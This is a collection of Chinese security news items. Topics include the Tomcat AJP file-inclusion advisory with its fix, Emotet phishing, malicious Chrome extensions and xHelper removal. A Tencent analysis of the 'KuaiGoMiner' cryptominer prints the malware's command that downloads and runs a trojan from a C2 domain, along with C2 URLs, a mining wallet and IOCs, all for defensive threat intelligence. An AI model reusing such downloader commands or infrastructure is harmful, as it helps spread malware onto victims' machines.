国家信息安全漏洞共享平台（CNVD）近日发布了一份关于 Apache Tomcat 存在文件包含漏洞的安全公告，安全公告编号：CNTA-2020-0004，具体信息如下: 2020 年 1 月 6 日，国家信息安全漏洞共享平台（CNVD）收录了由北京长亭科技有限公司发现并报送的 Apache Tomcat 文件包含漏洞（CNVD-2020-10487，对应 CVE-2020-1938）。攻击者利用该漏洞，可在未授权的情况下远程读取特定目录下的任意文件。目前，漏洞细节尚未公开，厂商已发布新版本完成漏洞修复。 一、漏洞情况分析 Tomcat 是 Apache 软件基金会 Jakarta 项目中的一个核心项目，作为目前比较流行的 Web 应用服务器，深受 Java 爱好者的喜爱，并得到了部分软件开发商的认可。Tomcat 服务器是一个免费的开放源代码的 Web 应用服务器，被普遍使用在轻量级 Web 应用服务的构架中。 2020 年 1 月 6 日，国家信息安全漏洞共享平台（CNVD）收录了由北京长亭科技有限公司发现并报送的 Apache Tomcat 文件包含漏洞。Tomcat AJP 协议由于存在实现缺陷导致相关参数可控，攻击者利用该漏洞可通过构造特定参数，读取服务器 webapp 下的任意文件。若服务器端同时存在文件上传功能，攻击者可进一步实现远程代码的执行。 CNVD 对该漏洞的综合评级为“高危”。 二、漏洞影响范围 漏洞影响的产品版本包括： Tomcat 6 Tomcat 7 Tomcat 8 Tomcat 9 CNVD 平台对 Apache Tomcat AJP 协议在我国境内的分布情况进行统计，结果显示我国境内的 IP 数量约为 55.5 万，通过技术检测发现我国境内共有 43197 台服务器受此漏洞影响，影响比例约为 7.8%。 三、漏洞处置建议 目前，Apache 官方已发布 9.0.31、8.5.51 及 7.0.100 版本对此漏洞进行修复，CNVD 建议用户尽快升级新版本或采取临时缓解措施： 1.   如未使用 Tomcat AJP 协议： 如未使用 Tomcat AJP 协议，可以直接将 Tomcat 升级到 9.0.31、8.5.51 或 7.0.100 版本进行漏洞修复。 如无法立即进行版本更新、或者是更老版本的用户，建议直接关闭 AJPConnector，或将其监听地址改为仅监听本机 localhost。 具体操作： （1）编辑 <CATALINA_BASE>/conf/server.xml，找到如下行（<CATALINA_BASE> 为 Tomcat 的工作目录）： <Connector port="8009"protocol="AJP/1.3" redirectPort="8443" /> （2）将此行注释掉（也可删掉该行）： <!--<Connectorport="8009" protocol="AJP/1.3"redirectPort="8443" />--> （3）保存后需重新启动，规则方可生效。 2.   如果使用了 Tomcat AJP 协议： 建议将 Tomcat 立即升级到 9.0.31、8.5.51 或 7.0.100 版本进行修复，同时为 AJP Connector 配置 secret 来设置 AJP 协议的认证凭证。例如（注意必须将 YOUR_TOMCAT_AJP_SECRET 更改为一个安全性高、无法被轻易猜解的值）： <Connector port="8009"protocol="AJP/1.3" redirectPort="8443"address="YOUR_TOMCAT_IP_ADDRESS" secret="YOUR_TOMCAT_AJP_SECRET"/> 如无法立即进行版本更新、或者是更老版本的用户，建议为 AJPConnector 配置 requiredSecret 来设置 AJP 协议认证凭证。例如（注意必须将 YOUR_TOMCAT_AJP_SECRET 更改为一个安全性高、无法被轻易猜解的值）： <Connector port="8009"protocol="AJP/1.3" redirectPort="8443"address="YOUR_TOMCAT_IP_ADDRESS"require 附：参考链接 https://tomcat.apache.org/connectors-doc/ajp/ajpv13a.html https://tomcat.apache.org/tomcat-8.0-doc/config/ajp.html https://stackoverflow.com/questions/21757694/what-is-ajp-protocol-used-for   (稿源：开源中国，封面源自网络。）

网络诈骗者往往会抓住时下热点，欺骗用户点击链接或者下载含有恶意代码的软件。例如在过去几个月中，就有诈骗者利用澳大利亚山火进行虚假众筹，以及出售假冒的科比·布莱恩特纪念品等等。时下最热门的话题莫过于新型冠状病毒，因此诈骗者利用该新闻进行传播恶意程序就没有奇怪的了。 这些恶意行为最早是由CheckPoint发现的，这些网络诈骗者发送了当地或者全球世界卫生组织的官方文件。如果用户打开这些看上去合法的文件，那么计算机就会被感染。 根据初步调查这种恶意行为在日本最为猖獗，诈骗者伪装日本残疾人福利服务提供商分发了携带有Emotet（连续4个月位排行第4的恶意软件）的电子邮件附件。这些电子邮件似乎正在报告感染在日本几个城市中蔓延的位置，这鼓励受害者打开文档，如果打开该文档，则尝试在其计算机上下载Emotet。 也有报道称，诈骗者正在使用带有恶意链接的网络钓鱼电子邮件，乍一看似乎将用户定向到疾病控制与预防中心（CDC）的官方网站，而实际上他们被引导到鼓励用户访问的页面他们输入他们的电子邮件帐号密码。   (稿源：cnBeta，封面源自网络。）  

感谢腾讯御见威胁情报中心来稿！ 原文：https://s.tencent.com/research/report/888.html   一、背景 腾讯安全威胁情报中心检测到“快Go矿工”更新，该团伙本次更新利用MSSQL弱口令爆破攻击的方式进行传播。“快Go矿工”由御见威胁情报中心于2019年10月发现，最初仅利用“永恒之蓝”漏洞进行攻击传播，因其使用的C2域名中包含“kuai-go”，腾讯安全威胁情报中心将其命名为“快Go矿工”（KuaiGoMiner）。 “快Go矿工”最新变种将挖矿程序伪装成系统进程WinInit.exe，截止目前已挖矿获得门罗币47个，市值人民币2万余元。同时，病毒在攻陷机器上植入的gh0st远控木马，具有搜集信息、上传下载文件、键盘记录、执行任意程序等多种功能，被攻陷的电脑还会面临机密信息泄露的风险。 据腾讯威胁情报中心统计数据，“快Go矿工”（KuaiGoMiner）变种已攻击上万台电脑，受害最严重地区为江苏、山东和广东。 腾讯安全提醒企业用户检查SQL服务器的SA用户口令，切勿配置弱口令登录，快Go矿工入侵后还会使用永恒之蓝系列攻击工具横向传播，植入远控木马，对政企机构信息系统安全构成严重威胁。 二、漏洞攻击 “快Go矿工” (KuaiGoMiner) 变种在攻陷的系统下载攻击模块，释放NSA武器中的“双脉冲星”、“永恒浪漫”、“永恒之蓝”漏洞攻击工具，释放到C:\Windows\Fonts\usa\目录下。 释放成功后go.vbs首先启动，然后执行go.bat，在go.bat中利用服务管理工具NSSM（释放文件名为svchost.exe）将攻击脚本cmd.bat安装为服务HTTPServers反复执行。 cmd.bat请求http[:]//scan.jiancai008.com:88/2020/local.asp和 http[:]//sex.zhzy999.net/ip2.php获取本机的IP地址， 请求http[:]//scan.jiancai008.com:88/2020/random.asp获取随机生成的C段和D段为“0.0“的IP地址，然后利用 “永恒之蓝”漏洞攻击工具针对本机同网段IP和随机生成的IP进行扫描攻击。 三、MSSQL爆破 近期KuaiGoMiner还利用MSSQL弱口令爆破进行攻击，爆破成功后首先通过shell代码写入vget.vbs作为下载者程序，然后利用vget.vbs下载PE木马sql.exe，下载命令如下： C:/Program Files (x86)/Microsoft SQL Server/MSSQL.1/MSSQL/Binn/sqlservr.exe C:/Windows/System32/CScript.exe C:/ProgramData/vget.vbs  http[:]//sex.zhzy999.net/sql.exe C:/ProgramData/taskger.exe sql.exe为gh0st远控木马，该木马控制电脑后，继续下载挖矿木马http[:]//go.jiancai008.com:88/2020/1.rar，然后解压释放文件到目录C:\Windows\Fonts\usa\。 将门罗币挖矿程序WinInit.exe安装为服务”WinIniter”，使用矿池：xmr-eu1.nanopool.org:14433，钱包：4Ao7AGamzR4cs4E4uK5tcFF9TR6ouXMY4LAi64jHGYQZRWYCupQ7coBGzE7BtcHBWvQFreNEMg1s9iws7ejgwZtB1gQ55Uq进行挖矿。 目前该钱包已挖矿获取门罗币47.169个，折合人民币28000余元。 四、安全建议 1.服务器使用安全的密码策略，特别是IPC$、MSSQL、RDP服务的账号密码，切勿使用弱口令； 2.根据微软公告及时修复以下Windows系统高危漏洞； MS17-010永恒之蓝漏洞 XP、WindowsServer2003、win8等系统访问： http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598 Win7、win8.1、Windows Server 2008、Windows10,WindowsServer2016等系统访问：https://technet.microsoft.com/zh-cn/library/security/ms17-010.aspx 建议企业用户使用腾讯T-Sec终端安全管理系统（腾讯御点，下载链接：https://s.tencent.com/product/yd/index.html），个人用户使用腾讯电脑管家进行漏洞扫描和修复。 3.企业用户可部署腾讯T-Sec高级威胁检测系统(御界)，发现、追踪黑客攻击线索。腾讯T-Sec高级威胁检测系统是基于腾讯安全反病毒实验室的安全能力、依托腾讯在云和端的海量数据，研发出的独特威胁情报和恶意检测模型系统。（https://s.tencent.com/product/gjwxjc/index.html） IOCs IP 64.111.27.3 Domain sex.zhzy999.net scan.jiancai008.com s.jiancai008.com go.jiancai008.com URL http[:]//sex.zhzy999.net/sql.exe http[:]//go.jiancai008.com:88/2020/1.rar http[:]//go.jiancai008.com:88/2020/2.rar http[:]//go.jiancai008.com:88/2020/3.rar MD5 1a5ba25af9d21f36cf8b3df7d2f55348 b87af17c857b208fcd801cb724046781 09bf2fef86d96ec9a1c3be0a020ae498 57bd72d6dc95ff57b5321a62b9f7cde2 70d3908f1b9909b7d23ee265e77dd1f9 1f1bc2ec00db3551d7700c05c87956df 05c57ccd23ab3f623bf1adda755af226

NIC.gp 的安全研究员和开发人员 Michel Gaschet 于近日提出，Microsoft 在其数千个子域的管理方面存在问题，存在有许多子域可以被劫持并用于攻击用户、员工或显示垃圾内容。据 ZDNet 报道称，Gaschet 在接受其采访时说，在过去三年中，他一直在向 Microsoft 报告带有错误配置的 DNS 记录的子域，但该公司要么忽略报告，要么就是默默地保护某些子域。 Gaschet 表示，他已经在 2017 年向微软报告了 21 个容易受到劫持的 msn.com 子域 [1, 2]，并在 2019 年报告了 142 个错误配置的 microsoft.com 子域 [1, 2]。此外，他还分享了其于去年向微软报告的 117 个 microsoft.com 子域列表。 Gaschet 透露，在其报告的所有错误配置的子域中，微软仅解决了其中的几个，被修复的数量占比只有他所报告数量的 5％-10％ 左右。并称，该操作系统制造商通常会修复较大的子域，例如 cloud.microsoft.com 和 account.dpedge.microsoft.com，却使其他子域暴露在劫持之下。 他还表示，大多数 Microsoft 子域在其各自的 DNS 条目中容易受到基本错误配置的攻击。Gaschet 称，“根本原因/错误是忘记了 DNS 条目，指向不再存在或根本不存在的内容，例如 DNS 条目内容中的错字。” Gaschet 在 Twitter 上指出，至少有一个垃圾邮件小组已经发现了他们可以劫持 Microsoft 的子域，并通过将其托管在信誉良好的域中来增加其垃圾内容。并表明，他已在至少四个合法的 Microsoft 子域中发现了印度尼西亚扑克赌场的广告，分别为 portal.ds.microsoft.com、perfect10.microsoft.com、ies.global.microsoft.com 和 blog-ambassadors.microsoft.com。 目前，ZDNet 已向微软征求意见，并要求该公司在当日的 Twitter 话题中对 Gaschet 提出的一系列问题发表评论。 Gaschet 在 Twitter 上猜测，微软不优先解决这些问题的原因之一是因为“subdomain takeovers”不属于公司的漏洞悬赏计划的一部分，这意味着即使所报告的问题很严重，这些报告也不会得到优先处理。 同时，Gaschet 敦促微软改变其管理 DNS 记录的方式。并称，这是造成这些错误配置的主要原因。   （稿源：开源中国，封面源自网络。）

一个国际研究小组去年底在《Nature Communications》期刊上发表论文，描述了一种完美保密的新加密系统，声称能对抗未来的量子计算机。英特尔公司的加密专家 Rafael Misoczki 称，完美保密是加密学中最高等级的安全观念，一个加密系统如果能实现完美保密，那么不管对手的计算能力有多强它将仍然是安全的。 绝大多数实现完美保密的尝试都集中在开发量子密钥分发系统（QKD），但部署 QKD 系统需要企业和政府投入大量资金去建造新的量子通信线路。但研究人员描述的新完美保密加密方法是基于现有的光纤通信基础设施。它不是依赖于量子物理学，而是基于混沌光状态。 受人指纹的启发，研究人员在硅芯片表面使用反射纳米盘印上点状图案，芯片的图案表面充当了激光的迷宫，光波以随机方式穿过时会正在里面反弹。不管输入条件如何，进入图案的光会产生混沌运动。 利用这套系统 Alice 和 Bob 可以创造无法拦截和监听的一次性密钥，类似 QKD。但计算机科学家对此有不同看法，他们认为论文作者对加密学的看法有着明显错误，量子计算机并不能破解所有经典加密学方法，如 AES 只要增加密钥长度仍然能抵抗量子计算机。 在加密学中运用混沌理论早在 1989 年就有人提出过，但因为存在漏洞而没有流行起来。   （稿源：solidot，封面源自网络。）

Let’s Encrypt是一家得到Mozilla Firefox和Google Chrome支持的自动化证书颁发机构。今天该机构宣布了一项新措施，从而进一步保护用户免受网络攻击的侵害。这项新功能称之为多角度域认证（multi-perspective domain validation），可帮助证书颁发机构（CA）证明申请人对他们想要获得证书的域具有掌控权。 域验证并不是什么新问题，但在验证过程中还存在很多的漏洞，这意味着网络攻击者可以诱使CA机构错误的颁发证书。而通过多角度域认证，网络攻击者需要同时破坏三个不同的网络路径，这不仅大大提高了安全系数，而且在互联网拓扑社区中也能更快发现网络攻击行为。 在新闻稿中，Let’s Encrypt特别感谢了普林斯顿大学的几位研究人员在多角度域验证方面的帮助，并表示将继续与研究人员合作，以改善设计和实施的有效性。   (稿源：cnBeta，封面源自网络。）

Word Press插件Theme Grill Demo Importer的漏洞被修复，影响将近20万个网站，该插件可以利用漏洞清除网站数据库并获得管理员权限。管理员可对演示内容等进行内部设置。 网络安全公司Web ARX研究人员近期发现：该插件的1.3.4到1.6.1版本受一个关键漏洞影响，漏洞可允许未经身份验证的攻击者擦除Word Press网站的整个数据库，而该公司研究人员发现该漏洞已经存在三年。 据了解，该插件存在的漏洞会导致数据库进行默认设置和数据填充，如果数据库中包含名为“admin”的用户，攻击者则利用漏洞会以管理员身份自动登录。 此外，Web ARX的首席执行官Oliver Sild 表示：并非所有安装了Theme Grill Demo Importer的Word Press网站都容易受到攻击，若想要利用该漏洞，必须安装使用插件。他们公司会提供漏洞检测和虚拟补丁软件，以保护网站免受第三方组件漏洞的攻击，也可利用Theme Grill漏洞实现自动化。 该漏洞已于2月6日报告给Theme Grill开发人员，并于2月16日通过1.6.2版进行了修补。   消息来源：securityweek， 译者：dengdeng，校审：吴烦恼 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

IOTA 不是基于区块链而是基于有向非循环图这一数学概念的加密货币，它诞生于比特币最为火热的 2017 年。上周，在得知黑客正利用官方钱包应用漏洞窃取用户资金之后，管理 IOTA 的基金会关闭了整个加密货币网络。 攻击发生在 2 月 12 日，IOTA 基金会在收到报告 25 分钟内关闭了用于批准交易的最后一个节点 Coordinator，阻止黑客窃取用户资金，但事实上也关闭了整个网络。攻击者被认为针对了 10 个高价值的用户，利用官方钱包应用 Trinity 的漏洞窃取资金。据非官方消息称，有大约价值 160 万美元的 IOTA 币被窃取。IOTA 团队在周日发布了 1.4 版本，修复了被利用的漏洞。目前网络仍然下线，开发者正在敲定补救计划。   (稿源：solidot，封面源自网络。）

xHelper 是一种 Android 恶意软件，安全厂商 Malwarebytes 于 2019 年 5 月检测到了它的存在。这是一个隐蔽的恶意软件删除程序，即使在用户恢复出厂设置以后，该恶意软件还是会重新感染，从而给全世界的用户带来了持续困扰。 Malwarebytes 的安全研究人员一直在研究该威胁，在近日发布的一篇博客文章中，该团队表示，尽管仍未弄清楚该恶意软件如何自行重新安装，但他们确实已经发现了有关其操作方式的足够信息，以便永久删除它，并防止 xHelper 在恢复出厂设置后重新安装自身。 据 Malwarebytes 小组透露，xHelper 找到了一种使用 Google Play Store 应用内的进程来触发重新安装操作的方法。借助在设备上创建的特殊目录，xHelper 可以将其 Android 应用程序包（Android application package，APK）隐藏在磁盘上。与应用程序不同，即使在恢复出厂设置后，其目录和文件仍保留在 Android 移动设备上。因此，在删除目录和文件之前，设备将继续受到感染。 Malwarebytes 在对恶意软件的分析中解释道，“Google Play 未感染恶意软件。但是，Google Play 中的某些事件触发了重新感染-可能是某些东西正在存储中。此外，有些东西可能还会将 Google Play 用作烟幕，从而将其伪装为恶意软件的安装来源，而实际上它来自其他地方。” 删除 xHelper 的方法 值得注意的是，以下删除步骤依赖用户安装适用于 Android 的 Malwarebytes 应用程序，不过该应用程序可免费使用。 具体删除步骤如下： 从Google PLAY 安装文件管理器，该文件管理器可以搜索文件和目录。 Amelia 使用了 ASTRO 的 File Manager。 暂时禁用 Google PLAY 以停止重新感染。 转到设置 > 应用 > Google Play 商店 按禁用按钮在 Android 的 Malwarebytes 中运行扫描，以删除 xHelper 和其他恶意软件。 手动卸载可能是困难的，但是要在“应用程序”信息中查找的名称是 fireway，xhelper 和“设置”（仅在显示两个设置应用程序的情况下）。打开文件管理器并搜索以 com.mufc 开头的任何内容。 如果找到，记下最后修改日期。 专业提示：在文件管理器中按日期排序 在 ASTRO 的文件管理器中，您可以在视图设置下按日期排序删除以 com.mufc 开头的所有内容。以及具有相同日期的任何内容（除了核心目录，如 Download）： 重新启用 Google PLAY 转到设置 > 应用 > Google Play 商店 按启用按钮   （稿源：开源中国，封面源自网络。）

在思科Duo Security团队和安全研究员贾米拉·卡亚（Jamila Kaya）两个多月的深入调查之后，谷歌近日宣布从官方网上商城删除500多个恶意Chrome扩展程序。据悉这些扩展程序都会在用户浏览会话中注入恶意广告（malvertising）。 这些扩展程序注入的恶意代码会在特定条件下激活，并将用户重定向到特定的页面。在某些情况下，重定向地址可能是Macys，DELL或BestBuy等合法网站上的会员链接；而在其他情况下可能是恶意站点，例如恶意软件的下载站点或者网络钓鱼页面。 根据Duo Security团队和Jamila Kaya分享的报告，这些恶意扩展程序上线至少有两年时间了。这些恶意扩展最初是由Kaya发现的，她在例行的威胁扫描期间发现这些恶意扩展通过通用URL模式访问恶意网站。 利用CRXcavator（一种用于分析Chrome扩展程序的服务），Kaya发现了最初的扩展程序集群，它们在几乎相同的代码库上运行，但是使用了各种通用名称，而鲜有关于其真实用途的信息。 Kaya告诉我们：“仅靠我个人，就确定了十几个采用该共享模式的扩展程序。与Duo联络后，我们能够使用CRXcavator的数据库对其进行快速指纹识别，并发现整个网络”。根据Duo的说法，首批扩展程序的安装总数超过了170万名Chrome用户。 Kaya表示随后我们将发现的结果反馈给了谷歌。随后谷歌经过自查发现了更多符合这种模式的扩展程序，随后删除了500多个扩展程序。目前尚不清楚有多少用户安装了500多个恶意扩展，但数量可能超过数百万。   （稿源：cnBeta，封面源自网络。）